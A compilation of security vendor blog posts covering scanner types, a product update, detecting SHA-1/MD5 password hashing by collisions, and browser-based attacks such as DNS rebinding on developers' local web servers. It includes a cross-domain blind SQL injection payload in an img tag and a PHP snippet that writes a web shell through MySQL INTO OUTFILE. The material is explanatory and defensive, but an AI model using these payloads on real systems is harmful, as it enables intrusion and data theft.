
The Advantage of Heuristic Over Signature Based Web Vulnerability Scanners


There are two different kinds of web application vulnerability scanners: heuristic and signature based scanners. This article explains how both types of scanners work and what type of vulnerabilities they can find in web applications.

How Do Signature Based Web Application Security Scanners Work?

Signature based scanners rely on a database of signatures for known vulnerabilities. Therefore for a scanner to recognize a vulnerability, a signature for that specific vulnerability has to be added to its database first.

This means that these scanners need to be updated regularly, because an update is released every time a new vulnerability is found in a specific web application. Usually, signature based scanners do not run any additional security checks to determine whether or not the detected vulnerability is exploitable. Their checks rely only on a number of unreliable criteria, such as the version details of the target web application, file paths, directory structures and so on.

This means that signature based web security scanners are more prone to reporting false positive vulnerabilities. For example, if a patch is applied manually to a web application without changing the version file, a signature based scanner will report a false positive. This also means that signature based scanners can only scan known and off-the-shelf web applications such as WordPress, Joomla! and Drupal.

A popular signature based scanner is WPScan, which scans WordPress websites and their plugins and themes for known vulnerabilities. Another popular signature based scanner is Nikto, which scans for server misconfigurations and dangerous files.

How Do Heuristic Web Application Security Scanners Work?

Heuristic web vulnerability scanners do not need a database to detect vulnerabilities. They do not rely on signatures of already discovered security bugs. They are able to determine if a web application is vulnerable by actively probing for vulnerability classes, such as Cross-site Scripting (XSS) and SQL Injection vulnerabilities.

This means that, unlike signature based scanners, heuristic web vulnerability scanners are able to find 0-day vulnerabilities in a web application. Heuristic web application security scanners also do not need to be updated as often as signature based ones, and they can scan and find vulnerabilities in any type of off-the-shelf or custom built web application and web service.

Netsparker, our dead accurate web application security scanner is a heuristic scanner.

Examples of 0-day Vulnerabilities Identified by a Heuristic Web Vulnerability Scanner

As part of our regular testing of the Netsparker web application scanner, we scan an ever changing list of open source web applications. In the last few years, Netsparker identified thousands of zero-day vulnerabilities in such web applications, and as of today, we have published over 150 advisories. For a number of reasons we do not publish an advisory for every vulnerability we discover, which is why the number of advisories is lower than the number of identified vulnerabilities.

A few good examples of 0-day issues Netsparker identified are:

None of the above vulnerabilities were previously known, therefore a signature based scanner would not have warned the user about them.

Using Both Signature Based & Heuristic Web Vulnerability Scanners

Clearly a heuristic web security scanner can do much more than a signature based scanner in terms of security, but don't write off signature based scanners either. They also have their advantages.

For example, if you want to scan a WordPress website for known vulnerabilities and security weaknesses, the signature based scanner WPScan will definitely do a very good job and can deliver the scan results very fast. In such cases, a heuristic scanner is overkill. However, to scan a complex custom application for unknown security bugs, you should use a heuristic web application security scanner such as Netsparker.


June 2017 Update of Netsparker Desktop


A few weeks ago we released update 4.9.0.15101 of the Netsparker Desktop web application security scanner. This is a major update: we have included a good number of new web security checks and new features, as well as many improvements and bug fixes.

Read this blog post for an overview of what is new and improved. For a more detailed list please refer to the Netsparker Desktop changelog.

New Web Security Checks

Referrer Policy Security Checks

The Referrer Policy, a W3C Candidate Recommendation since January of this year, is used by web applications to control the value of the Referer HTTP header. The Referer header, which is sent with an HTTP request, contains the URL of the previously browsed page.

During a web vulnerability scan, the Netsparker scanner checks if the web application is setting the correct Referrer Policy, to ensure, for example, that no information is leaked during cross-site navigation or when navigating from an HTTPS to an HTTP site. There are several other Referrer Policy security checks that Netsparker does during the scan; the above is just one example.
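For illustration, here is a minimal sketch of how a PHP application might set such a policy. The header name and values come from the W3C specification; the choice of strict-origin-when-cross-origin is just one sensible example, not a value the article prescribes:

<?php
// Send the full URL in the Referer header only for same-origin requests,
// send just the origin for cross-origin requests, and send nothing at all
// when navigating from HTTPS to HTTP.
header('Referrer-Policy: strict-origin-when-cross-origin');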


Other Web Security Checks

In this update, we also included several other security checks, such as:

New Features in Netsparker Desktop

Below is just an overview of some of the new features in Netsparker Desktop web application security scanner:

  • Improved Netsparker's Proxy: The Netsparker proxy that is used during a manual crawl of a web application has been rewritten and now supports protocols such as TLS 1.1 and 1.2.
  • Hex Editor in Request Builder: You can now view an HTTP request in the HTTP Request Builder in hex format.


  • New attack optimization option for parameters that appear on multiple pages: Web pages are made up of a number of components, such as a search widget, a newsletter subscription form and other forms. Such components are used on multiple pages, and by default the scanner attacks a component's parameters every time it crawls them through a different page, thus slowing down the scan. In this update of Netsparker we introduced a new option, Optimize Attacks to Recurring Parameters, which you can enable to configure a limit on how many times the scanner attacks the same parameter, even when it is crawled through different pages.


  • New CSRF Settings in Scan Policy: We have added a new CSRF node in the Scan Policy Editor, in which you can specify the name of a form, action or component that should be excluded from CSRF checks. Since search forms or forms with a CAPTCHA cannot be vulnerable to CSRF, you can exclude them, along with CAPTCHA indicators, to optimize the scan speed and duration.


  • Site Profile Knowledge Base Node: In the new Site Profile knowledge base node you will find information about the target website, such as the operating system of the web server, the web server software and so on.


Other New Features and Improvements

Apart from the above, we have included several other new features and improvements in the latest update of the dead accurate web application security scanner, such as:

  • Improved the parsing of JavaScript and CSS resources,
  • Added proof of exploitation for XXE vulnerabilities,
  • Improved the WSDL (web services) parsing,
  • Improved the highlighting of patterns in HTTP responses,
  • Improved the Local File Inclusion vulnerability detection checks,
  • And many others!

For a detailed and complete list please refer to the changelog. You will be prompted that an update of Netsparker Desktop is available the next time you start the scanner. Should you need any assistance with the update, or have any questions, do not hesitate to get in touch.

Collision Based Hashing Algorithm Disclosure


In February 2017 a number of Google engineers created the first SHA-1 collision. Even though this hashing algorithm was already marked as deprecated by NIST in 2011, it is still widely used.

 

What are Hash Collisions?

A hash collision happens when two different cleartext values produce the same hash value. Collisions can lead to a wide range of problems, but we won't cover them in this article.

Instead, in this blog post we will take a look at another side effect of collisions: a method that allows you to detect whether or not a website uses a weak hash function. This can be done without having access to the source code.

To make it easy to remember, we refer to this method as Collision Based Hashing Algorithm Disclosure.

Example of a Hash Collision

The collision the Google engineers identified allows anybody to create two PDF files with different content but the same hash. Let's take a look at both of the cleartext values Google used:

255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017346DC9166B67E118F029AB621B2560FF9CA67CCA8C7F85BA84C79030C2B3DE218F86DB3A90901D5DF45C14F26FEDFB3DC38E96AC22FE7BD728F0E45BCE046D23C570FEB141398BB552EF5A0A82BE331FEA48037B8B5D71F0E332EDF93AC3500EB4DDC0DECC1A864790C782C76215660DD309791D06BD0AF3F98CDA4BC4629B1

255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017F46DC93A6B67E013B029AAA1DB2560B45CA67D688C7F84B8C4C791FE02B3DF614F86DB1690901C56B45C1530AFEDFB76038E972722FE7AD728F0E4904E046C230570FE9D41398ABE12EF5BC942BE33542A4802D98B5D70F2A332EC37FAC3514E74DDC0F2CC1A874CD0C78305A21566461309789606BD0BF3F98CDA8044629A1

Both strings are hex encoded; once you decode and hash them, they result in the same SHA-1 sum:

f92d74e3874587aaf443d1db961d4e26dde13e9c

Introducing Collision Based Hashing Algorithm Disclosure

Hashing Algorithms in Web Applications

When you register to an online service, the majority of websites will hash your password and store the hash in the database. This is good practice, since it allows the web application to store your password in a form that doesn't allow a potential attacker to view it in plain text, should he gain access. However, to be effective, a strong hashing algorithm has to be used. This means that algorithms like SHA-1 and MD5 are not suitable for this kind of application. Nonetheless, they are still often used by developers to hash passwords.

When you try to log in to the website, the password hash stored in the database is compared to the hash generated on the fly from the password you submit in the login form. Therefore, if the target web application uses the SHA-1 hashing algorithm and we supply our collision strings, the hash will be the same. This also means that we can log in using two different strings/passwords.

By using the same technique in a black box fashion, we can determine whether or not a web application uses a vulnerable hashing algorithm, as explained below.

How Does the Collision Based Hashing Algorithm Disclosure Work?

The Theory Behind the Attack

In theory, it is very simple. Create an account on the web application that you would like to test. As a password, use a string that produces the same hash as another, different string. Once the account is registered, try to log in again, but this time supply the other string that produces the same hash as the password. If you manage to log in, it means that the target web application uses the SHA-1 algorithm.

Example of Collision Based Hashing Algorithm Disclosure

Let's assume that when you register a new user on a web application, it takes the cleartext1 string that you supplied as a password and hashes it. As seen below, the hashed password results in the hash abcd (simplified), which is then stored in the database:

hash(cleartext1) == ‘abcd’

Note: To keep things simple, we will not take salts into consideration (a salt is a random string that is concatenated with the password to make it more secure against certain types of attacks).

The web application stores the hash generated from that process in the database. When you try to log back into the web application, the same hashing algorithm is applied to the password you supply in the login form. This hash is then compared to the one in the database and if they match you will log in.

So let’s assume that to login now you used cleartext2 as password, and when the web application hashes it using the SHA-1 algorithm, the same hash is produced:

hash(cleartext2) == ‘abcd’

When the web application compares the hashed password with the hash that was stored in the database, they will match and you will log in:

hash(password) == dbhash
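To make this concrete, here is a minimal, deliberately vulnerable PHP sketch of such a registration and login flow; the users table and its columns are hypothetical. Because the stored value is an unsalted SHA-1 hash, any two inputs that collide under SHA-1 are interchangeable as passwords:

<?php
// Deliberately vulnerable sketch: unsalted SHA-1 password storage.
function register(PDO $db, string $user, string $password): void {
    $stmt = $db->prepare('INSERT INTO users (name, pass_hash) VALUES (?, ?)');
    $stmt->execute([$user, sha1($password)]);
}

function login(PDO $db, string $user, string $password): bool {
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE name = ?');
    $stmt->execute([$user]);
    // If sha1($a) === sha1($b) for two different inputs, both will log in.
    return $stmt->fetchColumn() === sha1($password);
}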

However, this method has a few limitations and it won't work if:

  • Strict server side password length restrictions are used in the registration and login forms, for example, a maximum password length of 20 characters is enforced.
  • If there is a whitelist of allowed characters,
  • If there is a salt prepended (not appended); the sketch below shows why.
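To see why a prepended salt defeats the technique, consider this minimal sketch. The collision property holds only for the exact colliding messages: hashing salt-plus-password changes the internal hash state before the colliding blocks are processed, while an appended salt preserves the collision for equal-length colliding messages:

<?php
// With a prepended, per-user salt the stored value is sha1($salt . $password),
// so sha1($salt . $m1) and sha1($salt . $m2) are no longer guaranteed to
// collide, even though sha1($m1) === sha1($m2).
$salt = bin2hex(random_bytes(16)); // random per-user salt
$stored = sha1($salt . $_POST['password']);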

How To Check if a Web Application Uses SHA-1 Hashing Algorithm

Below is a step by step explanation of how you can check if a web application uses the SHA-1 hashing algorithm.

  1. Set up an interception proxy, such as the one in Netsparker Desktop, and configure the web browser to proxy the requests through it.
  2. Register an account on the web application and use a recognizable password such as !!PASS!! so it is easy to find when you intercept the HTTP request.
  3. Edit the registration request in the interception proxy by replacing all occurrences of the !!PASS!! string with the first collision string (converted to URL encoding) from the above example.

Interception of the user registration HTTP request with a proxy.

NOTE: To URL encode the collision strings you have to place a % character in front of every encoded byte. You can use the PHP code below to do it, where $collisionstring contains the hex encoded string:

// Split the hex string into byte pairs and prefix each with '%'.
echo implode(array_map(function ($byte) { return '%' . $byte; }, str_split($collisionstring, 2)));

  4. Once you send the request to the web application, it will generate a hash and store it in the database. If the web application uses the SHA-1 algorithm, the hash will be f92d74e3874587aaf443d1db961d4e26dde13e9c.
  5. Now try to log in to the web application using the !!PASS!! string as the password again.
  6. Intercept the login HTTP request and replace all occurrences of !!PASS!! with the URL encoded version of the second string.
  7. The web application will hash your supplied password and compare it to the stored value in the database. Once again the hash should be f92d74e3874587aaf443d1db961d4e26dde13e9c.

If the web application uses the SHA-1 hashing algorithm, you will log in even though you supplied a different value.

Results Expectations

If you do not manage to log in because the passwords do not match, then the web application uses a hashing algorithm other than SHA-1.

If you manage to log in to the web application, it means that the SHA-1 hashing algorithm is used for password hashing.

Does This Collision Based Hashing Algorithm Disclosure Work for SHA-1 Algorithm Only?

This method also works with other hashing algorithms that have known collisions, for example MD5. The prerequisites don't differ much, and the length restriction is less of a concern, as the known MD5 collisions are not as long; they are just 64 bytes. This might still be too long for some server side filtering though.

Here is a known MD5 collision which you can use for testing:

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2

Both strings will result in the following hash:

008ee33a9d58b51cfeb425b0959121c9
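As a quick sanity check, a few lines of PHP are enough to verify this collision pair, using the two hex strings exactly as printed above:

<?php
// The two 64-byte MD5 collision blocks from above, hex encoded.
$hex1 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2';
$hex2 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2';

$a = hex2bin($hex1);
$b = hex2bin($hex2);

var_dump($a === $b);           // bool(false) - different cleartext
var_dump(md5($a) === md5($b)); // bool(true)  - identical MD5 hash
echo md5($a), PHP_EOL;         // 008ee33a9d58b51cfeb425b0959121c9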

Who Needs to Know about the Collision Based Hashing Algorithm Disclosure?

As a developer of a website you already know which hashing algorithm you use and do not need this test to see if your algorithm is secure or not. Just knowing which hashing algorithm is used also won’t aid an attacker during an attack.

However, there are two scenarios where this is especially useful: during a black box penetration test, where it is not possible to get a look at the source code, and as an additional step to check the authenticity of a database dump.

If a leaked database contains unsalted SHA-1 hashes and this method confirms that SHA-1 is indeed the hashing algorithm used by the website, it can be a small indicator that the dump might be credible.

The URL encoded strings

For easy copying here are the URL encoded strings for the above check:

SHA-1

String 1

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1

String 2

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1

MD5

String 1

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

String 2

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

Netsparker Sponsors BSides Manchester 2017



We are happy to be sponsoring BSides Manchester, which will be held on the 17th of August. During the conference, we will be exhibiting our dead accurate web application security scanner.

The previous BSides Manchester events were a great success and we are excited to be part of such a worthy conference this year. BSides Manchester was created out of the need for a second BSides in the UK. After all, the UK has one of the largest security communities in the world, and this should be celebrated. So if you're in the region, make it a point to attend.

The venue for BSides Manchester is the Manchester Metropolitan University Business School, which is based on the All Saints campus.

For more information, visit the BSides Manchester website where you can find out more about the event and how to support it.

For the latest news on BSides Manchester 2017, follow them on Twitter @BSidesMCR and Facebook.

Come by our Exhibition Space While at BSides Manchester 2017

If you are attending BSides Manchester 2017, then come and visit us at our Exhibition Space. We will be more than happy to answer any questions you might have about web vulnerability scanning and Netsparker.

Discussing Web Vulnerability Scanning in Continuous Integration on Enterprise Security Weekly


The earlier in the development process a vulnerability is found, the easier and cheaper it is to fix. For example, imagine a vulnerability is found during a penetration test in four or five month old code. It is very difficult for your developers, if they are even still the same ones, to go back and understand the logic and the code that they wrote five months before.

It can be even worse: a web developer introduces a vulnerability with his new code, but since no one points it out to him, he keeps on using similar code for the next few months. So over a few months, he can introduce a handful of vulnerabilities.

That's why it is important to integrate automated web application security scanning into your continuous integration. Automated scanning does not replace the need for penetration tests, but it definitely helps to streamline the web development process, as Ferruh Mavituna explained during episode 53 of Enterprise Security Weekly.

Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls


Software and web developers, owners of the latest IOT gadgets and people who just like to surf the web at home have one thing in common: they are all protected by a firewall.

Businesses typically protect their networks with dedicated, robust hardware firewalls, while home users usually have one built into their router. Firewalls are essential for internet security, since they prevent anyone on the outside from accessing the internal network, and possibly sensitive data. However, firewalls are no panacea. In some cases, malicious hackers can still attack a vulnerable web application that is hosted behind a firewall.

In this blog post, we will explain the different methods attackers can use to access vulnerable web applications behind firewalls, and we will also explain what countermeasures can be taken to thwart such attempts.


A Typical Web Application Developer’s Test Setup

As a web application developer it is impossible to write code without a proper testing environment. Fortunately, it is easy to install all the necessary pre-configured applications typically used for testing, so the majority of developers run a web server on their machine.

For Windows, there are popular packages such as XAMPP, which installs Apache, MySQL and PHP, a common combination for web development. On Linux, this can easily be done by installing the needed packages using a package manager. Both methods have the advantage that Apache is preconfigured to a certain degree. However, to prevent the Apache web server from being publicly accessible, developers have to configure it to listen on 127.0.0.1:80 instead of 0.0.0.0:80, or else use a firewall to block incoming connections. But is this enough to block incoming connections and possible malicious attacks in a testing environment?
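For reference, binding Apache to the loopback interface is a one-line change in the server configuration; the file location and the existing Listen directive vary by distribution:

# httpd.conf: accept connections on the loopback interface only
Listen 127.0.0.1:80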

Protected Test Web Server & Applications Are Still Vulnerable to Malicious Attacks

Unfortunately, many assume that the security measures mentioned above are enough to prevent anyone from sending requests to the web applications running on the test Apache web server. It is assumed that this form of eggshell security, hardened on the outside but vulnerable on the inside, allows them to safely run vulnerable test applications.

People also often assume that they are safe, even if a vulnerable or compromised machine is in the same network as long as it does not contain personal data. However, it is still possible for an attacker to tamper with files or databases, some of which are typically later used in production environments. Attackers can also probe the internal network for weaknesses. In some cases, it is even possible to use methods like ARP-Spoofing to carry out Man-In-The-Middle (MITM) attacks.

But how can an attacker gain access to the development environment when it is correctly configured to only listen on the loopback interface? Or, even better, when it is not accessible from the outside at all because of a firewall, or because it only allows whitelisted access from within the internal network? The answer is simple: through the developer's web browser.

Attacking the Developer’s Vulnerable Test Setup Through the Web Browser


Web browsers are considered to be the biggest attack surface on personal computers; their codebase and functionality are steadily growing, and through the years there have been some notoriously insecure browsers and plugins. Attackers also tend to target browsers due to shortcomings in the design of some modern protocols and standards. Most of them were built with good intentions, but they can also lead to serious vulnerabilities and easy cross-domain exploitation. For example, in some cases it is even possible to use the victim's browser as a proxy and tunnel web requests through it.

But new technologies are not the only problem with web browser security. There are much older issues. For example, one of the issues with the biggest impact is the fact that every website is allowed to send data to any other accessible website. Contrary to popular belief, the Same Origin Policy does not prevent the sending of data to a website; it only prevents browsers from retrieving the response. Therefore attacker.com can easily send requests to 127.0.0.1, and that is obviously a big problem.

In this article, we are going to explain how malicious attackers can execute a number of browser based attacks to retrieve data from the victim’s computer, which could be sitting behind a firewall or any other type of protection.

Vulnerable Test Websites on a Local Machine

The problem with Vulnerable Test Environments

http://localhost/

Security researchers and developers typically run vulnerable applications on their machines. For example, developers typically have web applications that are still in the development stage, where security mechanisms such as CSRF tokens or authentication may not be in place yet.

Security researchers have the same type of applications running on their computers. It is their job to find security issues, so they are typically testing vulnerable web applications, which makes them an easy target for these kinds of exploits.

Since the Same Origin Policy (SOP) prevents the attacker from mapping the web application to search for vulnerabilities, he has two possibilities to attack the victim:

  1. Use a blind approach, during which the attacker has to brute force file and parameter names,
  2. Use a method with which he can actually view and explore the web application. This is where methods such as DNS rebinding come into play.

DNS Rebinding Attack


This attack method is simple and allows attackers to easily retrieve information from the victim's computer if it is running a web server. During this attack, the malicious hacker exploits the web browser's DNS resolution mechanism to retrieve information, in this example from the /secret/ subdirectory on the server, as explained below:

  1. The attacker sets up a website on a live domain, for example, attacker.com that is hosted on the IP address 11.22.33.44.
  2. The attacker configures a very short DNS cache time (TTL, time to live) for the FQDN record.
  3. He serves a malicious script to the victim that when executed sends any data it finds back to the attacker controlled server every few minutes.
  4. The attacker changes the IP address of the FQDN attacker.com to 127.0.0.1.
  5. Since the TTL was set to a very short time, the browser tries to resolve the IP address of attacker.com again when executing the script that is trying to get the content of the /secret/ subdirectory. This needs to be done with a delay of about one minute, to let the browser's DNS cache expire.
  6. Since the script is now running and the IP address of attacker.com is now set to 127.0.0.1, the attacker's script effectively queries the content of 127.0.0.1/secret instead of 11.22.33.44/secret, thus retrieving the data from the victim's /secret/ subdirectory.

It is very difficult for the victim to identify this type of attack since the domain name is still attacker.com. And since the malicious script runs on the same domain, it also partially bypasses the Same Origin Policy.

DNS Rebinding is a Preventable Attack

DNS Rebinding attacks can be prevented at the web server level. We will talk more about prevention at the end of this article, but here is a short overview: as a developer, you should use an FQDN such as local.com on your local web server and whitelist that host header, so that any HTTP request that does not carry a whitelisted Host header is rejected.
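As an application-level sketch of the same idea (the whitelist values are examples, and note that the Host header may include a port):

<?php
// Reject any request whose Host header is not explicitly whitelisted;
// this stops DNS rebinding, where the hostname is attacker controlled.
$allowedHosts = ['local.com', '127.0.0.1'];

if (!in_array($_SERVER['HTTP_HOST'] ?? '', $allowedHosts, true)) {
    http_response_code(403);
    exit('Forbidden');
}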

Shared hosting is prone to DNS Rebinding only to a certain degree. This is due to the fact that the web server determines which of the websites to serve based on the Host header. If the Host header is not known to the web server, it will return the default website. So in this scenario, only the default host is vulnerable to such an attack.

Same Origin Policy is not completely bypassed

Since attacker.com is an entirely new domain for the user's browser, and only the IP address matches, it is not possible for the attacker to steal session information. Cookies are tied to a specific hostname by the browser, not to an IP address. This means that a cookie for http://127.0.0.1 is not valid for http://attacker.com, even though the latter points to 127.0.0.1.

However, in many cases a valid cookie is not needed, for example when a security researcher runs a web application that is vulnerable to a command injection vulnerability and no authentication is required. In such a case, the attacker can either use DNS rebinding or simple CSRF (once he knows the vulnerable file and parameter) to issue system commands.

Do Not Run Unpatched Web Applications on Local Machines - It is Dangerous

It is worth mentioning that there are many reasons why even non-developer users tend to have outdated software on the local network. It could be either because they forgot to update the software, or they do not know that an update is available. Many others do not update their software to avoid having possible compatibility issues.

The method we describe next is convenient if there are known vulnerable web applications on the victim's computer. We showed earlier how it is possible to identify and brute force WordPress instances in local networks using a technique called Cross Site History Manipulation, or XSHM. With XSHM it is possible to retrieve information about running applications and, under some circumstances, even get feedback on whether or not a CSRF attack has succeeded.

This method is too conspicuous to be used for brute force attacks or to scan local networks, since it requires a refreshing window or redirects. However, it can be used stealthily for short checks, since multiple redirects are not strange to modern websites; legitimate reasons for those are OAuth implementations or ad networks that redirect users to different domains.

So it is possible to quickly identify which CMS or web application is running on a given host. If there are known vulnerabilities, an attacker can use a known exploit and send the data back to himself, either by using JavaScript with DNS rebinding, out-of-band methods, or other Same Origin Policy breaches.

SQL injection Vulnerabilities on Your Local Network


Imagine a web application is vulnerable to a SQL injection in a SELECT statement that is only exploitable through a CSRF vulnerability, and the attacker knows that an ID parameter in the admin panel is vulnerable. The application runs with the least privileges needed to successfully retrieve data. The attacker cannot use an out-of-band method on MySQL without root privileges, since stacked queries do not work in such a setup. Also, the attacker cannot just insert an INSERT statement right behind the query.

However, he can use the sleep command which, when combined with a condition, forces the SQL database to wait for a given number of seconds before it continues to execute the query. So, for example, the attacker issues a command such as the following:

if the first character of the admin password is "a", sleep for 2 seconds.

If the request above takes less than two seconds to complete, then the first character in the password is not an “a”. The attacker tries the same with the letter “b”. If the request takes two seconds or longer to complete, then the first character of the password is “b”. The attacker can use this method to guess the remaining characters of the password.

This type of attack is called time based blind SQL injection. However, in the above scenario it does not seem like a useful attack, because the attacker cannot issue the requests directly but has to resort to CSRF. Also, the delay can only be detected in the user's browser through a difference in page loading time.
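For context, this is the kind of vulnerable server-side code such an attack targets; a deliberately insecure sketch with hypothetical database and parameter names:

<?php
// Vulnerable: the id parameter is concatenated straight into the query, so a
// payload like 1 AND IF(SUBSTRING(DATABASE(),1,1)='b',SLEEP(2),0) delays the response.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'appuser', 'secret');
$stmt = $pdo->query("SELECT name FROM users WHERE id = " . $_GET['id']);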

Exploiting SQL injection Vulnerabilities Cross-Domain

JavaScript can determine whether or not a page has finished loading by using the onload or onerror event handlers. Let's say the attack is GET based (even though POST is also possible) and the vulnerable parameter is called id. The attacker can:

1. Record the time it takes for a page to load.

2. Point an img tag to the vulnerable application, e.g.

<img src="http://192.168.1.123/admin.php?page=users&id=1+AND+IF+(SUBSTRING(DATABASE(),1,1)+=+'b',sleep(2),0)" onerror="pageLoaded()">

3. Record the time after the page finishes loading with pageLoaded().

4. Compare the values from step 1 and 3.

If there is a difference of two or more seconds in loading time, the attack was successful and the first letter of the database name is "b". If not, the attacker proceeds with the letters "c", "d", "e" and so on until there is a measurable time delay. Due to this timing side channel it is possible to leak page loading times and therefore, in combination with a SQL injection, valuable data.

Strong Passwords Are a Must, Even if The Web Application Is Not Public


People tend to use weak passwords for web applications that are running on machines behind a firewall, but that is the wrong approach. Let's say an attacker managed to compromise another computer in the same local network. If he notices a web application on another host, he will try to brute force the password for the admin panel. And if he guesses the credentials, since many modern web applications have upload functionality, the attacker can upload malicious files. Therefore an attacker is often able to plant a web shell on the server and issue commands on the machine hosting the web application.

But, as mentioned above, there does not need to be a prior compromise for the brute forcing. With DNS rebinding it is still possible to brute force the web application from a malicious website with low latency, since the web application already runs on localhost and the requests do not need to go over the web.

Therefore it is important to always use strong passwords, no matter from where the application is accessible.

Insecure phpMyAdmin Instances Can Be Dangerous


phpMyAdmin, a very popular MySQL manager, is often installed on developers' machines, and unfortunately most of these installations are not secure. For example, with some install scripts, MySQL and phpMyAdmin do not use authentication or use a blank password by default. This makes it very easy to exploit them through DNS rebinding, as no prior knowledge of a password is required to issue MySQL commands.

What makes phpMyAdmin especially dangerous is that it often runs with the highest possible privileges - as the MySQL root user. This means that once an attacker gains access to it, he can:

  • Extract data from all databases
  • Read Files
  • Write files

In some configurations of MySQL, file privileges are only allowed inside a specific directory. However, more often than not this security measure is not applied, especially in older versions. Therefore an attacker can read files and write attacker controlled content into the web root, which means he can plant a web shell: a small script that allows him to issue system commands. Once he manages to do that, he will most probably be able to escalate his privileges and place malware on the system or exfiltrate sensitive data.
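As an illustration of the risk, when the attacker can issue statements as the MySQL root user, a single query is enough to drop a minimal PHP web shell into the web root; the paths and file names below are examples:

<?php
// Running as MySQL root: write a minimal PHP web shell into the web root.
// Requires the FILE privilege and a permissive secure_file_priv setting.
$pdo = new PDO('mysql:host=127.0.0.1', 'root', '');
$pdo->exec("SELECT '<?php system(\$_GET[\"cmd\"]); ?>' INTO OUTFILE '/var/www/html/shell.php'");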

Typical Vulnerable Devices Found On a Network

Routers Need To Be Kept Up To Date

Web applications are not the only assets at risk on a network. Devices such as routers can also be targeted, mainly because they have a web interface, which typically runs with root privileges. Routers tend to be a popular and easy target because:

  • Web interfaces are poorly coded.
  • They sometimes have backdoors or remote controlled interfaces with standard passwords that users never change.
